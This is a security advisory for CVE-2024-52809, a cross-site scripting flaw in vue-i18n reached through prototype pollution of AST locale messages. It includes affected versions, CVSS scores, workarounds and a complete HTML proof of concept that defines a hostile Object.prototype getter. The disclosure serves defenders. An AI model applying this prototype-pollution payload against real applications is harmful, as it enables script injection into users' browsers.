logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-52809 vue-i18n

Package

Manager: npm
Name: vue-i18n
Vulnerable Version: >=9.3.0 <9.14.2 || >=10.0.0 <10.0.5

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N/E:U/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

EPSS: 0.0028 pctl0.5102

Details

vue-i18n has cross-site scripting vulnerability with prototype pollution ### Vulnerability type XSS ### Description vue-i18n can be passed locale messages to `createI18n` or `useI18n`. we can then translate them using `t` and `$t`. vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST. In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as `@intlify/unplugin-vue-i18n` and bulder to convert the AST in advance when building the application. By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST. The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a `static` property, but that is just one of the optimizations. About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`, so there is always a property that is attached during optimization like this time. But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects. ### Reproduce (PoC) ```html <!doctype html> <html> <head> <meta charset="utf-8" /> <title>vue-i18n XSS</title> <script src="https://unpkg.com/vue@3"></script> <script src="https://unpkg.com/vue-i18n@10"></script> <!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. --> <script> /** * Prototype pollution vulnerability with `Object.prototype`. * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler. * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts * * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`, * so there is always a property that is attached during optimization like this time. * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code. */ Object.defineProperty(Object.prototype, 'static', { configurable: true, get() { alert('prototype polluted!') return 'prototype pollution' } }) </script> </head> <body> <div id="app"> <p>{{ t('hello') }}</p> </div> <script> const { createApp } = Vue const { createI18n, useI18n } = VueI18n // AST style locale message, which build by `@intlify/unplugin-vue-i18n` const en = { hello: { type: 0, body: { items: [ { type: 3, value: 'hello world!' } ] } } } const i18n = createI18n({ legacy: false, locale: 'en', messages: { en } }) const app = createApp({ setup() { const { t } = useI18n() return { t } } }) app.use(i18n) app.mount('#app') </script> </body> </html> ``` ### Workarounds Before v10.0.0, we can work around this vulnerability by using the regular compilation (`jit: false` of `@intlify/unplugin-vue-i18n` plugin configuration) way instead of jit compilation. - jit compilation: https://vue-i18n.intlify.dev/guide/advanced/optimization.html#jit-compilation - bundler plugin option: https://github.com/intlify/bundle-tools/tree/main/packages/unplugin-vue-i18n#jitcompilation ### References - [Simillar case: Vue 2 XSS vulnerability with prototype pollution](https://www.herodevs.com/vulnerability-directory/cve-2024-6783)

Metadata

Created: 2024-12-02T17:26:20Z
Modified: 2024-12-02T17:26:21Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-9r9m-ffp6-9x4v/GHSA-9r9m-ffp6-9x4v.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-9r9m-ffp6-9x4v
Finding: F008
Auto approve: 1